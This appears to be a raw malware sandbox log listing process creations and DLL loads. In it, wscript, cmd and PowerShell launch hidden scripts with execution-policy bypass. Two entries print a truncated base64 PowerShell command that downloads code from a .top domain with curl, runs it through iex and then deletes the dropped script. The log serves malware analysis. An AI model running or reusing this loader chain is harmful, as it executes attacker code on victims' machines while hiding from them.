              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -file "C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKCiR4VGN3aUNQOW15QWhlZ0NzU3lZdEdaeDlpNkk5aHRtM1pXWkY0ZkVqdDNMVmdScVRIajZhaDZpWUw2ZUVqZ0Z0NXpoVjdwTWNXZDNtOHE4ckswWTd6cnNMViA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgNSB8ICUge1tjaGFyXSRffSkpOwokcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3djWkpLdUVvWXhmWWtLeWtSYW5pNWpaZ0trWU9uSzdCYVlJcjFFYXg1d1BIdVhObzlFZ0JiZFlUaU1qY01HRiA9IFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpOwokbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSBbaW50XShHZXQtRGF0ZSAtRm9ybWF0IG1tKTsKJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkID0gMzsKSWYgKCRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNSArICRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNUFkZCAtZ3QgNTkpIHsKICAgICRxa3FqSHZieUFDMHNmZ2V5SncwMHRzWUxISUxaWm9Pd2NaSkt1RW9ZeGZZa0t5a1Jhbmk1alpnS2tZT25LN0JhWUlyMUVheDV3UEh1WE5vOUVnQmJkWVRpTWpjTUdGID0gJHFrcWpIdmJ5QUMwc2ZnZXlKdzAwdHNZTEhJTFpab093Y1pKS3VFb1l4ZllrS3lrUmFuaTVqWmdLa1lPbks3QmFZSXIxRWF4NXdQSHVYTm85RWdCYmRZVGlNamNNR0YgKyAxOwogICAgJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1ID0gJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1ICsgJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkIC0gNjA7Cn0gRWxzZSB7CiAgICAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgKyAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDVBZGQ7Cn07CiRxa3FqSHZieUFDMHNmZ2V5SncwMHRzWUxISUxaWm9Pd2NaSkt1RW9ZeGZZa0t5a1Jhbmk1alpnS2tZT25LN0JhWUlyMUVheDV3UEh1WE5vOUVnQmJkWVRpTWpjTUdGID0gSWYgKFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpICsgMSAtZ3QgMjMpIHsiMDAifSBFbHNlIHskcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3djWkpLdUVvWXhmWWtLeWtSYW5pNWpaZ0trWU9uSzdCYVlJcjFFYXg1d1BIdVhObzlFZ0JiZFlUaU1qY01HRn07CiRxNHNrM0Z2eDE4eVRVNzZBbVhKeGtGelBtUWlTTSA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgMTIgfCAlIHtbY2hhcl0kX30pKTsKJGJpRFdYRDJWYkhQID0gQCIKJEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKY3VybCAtdXNlYiAiaHR0cDovL3JpZ3p1dnppM2JuejMudG9wLzEucGhwP3M9bWludHMxMyIgfCBpZXg7ClJlbW92ZS1JdGVtICJDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXCQoJHE0c2szRnZ4MTh5VFU3NkFtWEp4a0Z6UG1RaVNNKS5wczEiIC1Gb3JjZSAKIkA7CgoicG93ZXJzaGVsbCAtbm9wcm9maWxlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC1XaW5kb3dTdHlsZSB
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\ANwibhLHfyrt.ps1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c Continue = Continue
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /q /cC:\Users\user\AppData\Roaming\1Q5Mu4aI.bat
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -executionpolicy bypass -WindowStyle hidden -file "C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKCiR4VGN3aUNQOW15QWhlZ0NzU3lZdEdaeDlpNkk5aHRtM1pXWkY0ZkVqdDNMVmdScVRIajZhaDZpWUw2ZUVqZ0Z0NXpoVjdwTWNXZDNtOHE4ckswWTd6cnNMViA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgNSB8ICUge1tjaGFyXSRffSkpOwokcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3djWkpLdUVvWXhmWWtLeWtSYW5pNWpaZ0trWU9uSzdCYVlJcjFFYXg1d1BIdVhObzlFZ0JiZFlUaU1qY01HRiA9IFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpOwokbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSBbaW50XShHZXQtRGF0ZSAtRm9ybWF0IG1tKTsKJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkID0gMzsKSWYgKCRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNSArICRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNUFkZCAtZ3QgNTkpIHsKICAgICRxa3FqSHZieUFDMHNmZ2V5SncwMHRzWUxISUxaWm9Pd2NaSkt1RW9ZeGZZa0t5a1Jhbmk1alpnS2tZT25LN0JhWUlyMUVheDV3UEh1WE5vOUVnQmJkWVRpTWpjTUdGID0gJHFrcWpIdmJ5QUMwc2ZnZXlKdzAwdHNZTEhJTFpab093Y1pKS3VFb1l4ZllrS3lrUmFuaTVqWmdLa1lPbks3QmFZSXIxRWF4NXdQSHVYTm85RWdCYmRZVGlNamNNR0YgKyAxOwogICAgJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1ID0gJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1ICsgJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkIC0gNjA7Cn0gRWxzZSB7CiAgICAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgKyAkbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDVBZGQ7Cn07CiRxa3FqSHZieUFDMHNmZ2V5SncwMHRzWUxISUxaWm9Pd2NaSkt1RW9ZeGZZa0t5a1Jhbmk1alpnS2tZT25LN0JhWUlyMUVheDV3UEh1WE5vOUVnQmJkWVRpTWpjTUdGID0gSWYgKFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpICsgMSAtZ3QgMjMpIHsiMDAifSBFbHNlIHskcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3djWkpLdUVvWXhmWWtLeWtSYW5pNWpaZ0trWU9uSzdCYVlJcjFFYXg1d1BIdVhObzlFZ0JiZFlUaU1qY01HRn07CiRxNHNrM0Z2eDE4eVRVNzZBbVhKeGtGelBtUWlTTSA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgMTIgfCAlIHtbY2hhcl0kX30pKTsKJGJpRFdYRDJWYkhQID0gQCIKJEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKY3VybCAtdXNlYiAiaHR0cDovL3JpZ3p1dnppM2JuejMudG9wLzEucGhwP3M9bWludHMxMyIgfCBpZXg7ClJlbW92ZS1JdGVtICJDOlxVc2Vyc1xQdWJsaWNcRG9jdW1lbnRzXCQoJHE0c2szRnZ4MTh5VFU3NkFtWEp4a0Z6UG1RaVNNKS5wczEiIC1Gb3JjZSAKIkA7CgoicG93ZXJzaGVsbCAtbm9wcm9maWxlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC1XaW5kb3dTdHlsZSB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\ANwibhLHfyrt.ps1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c Continue = Continue
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
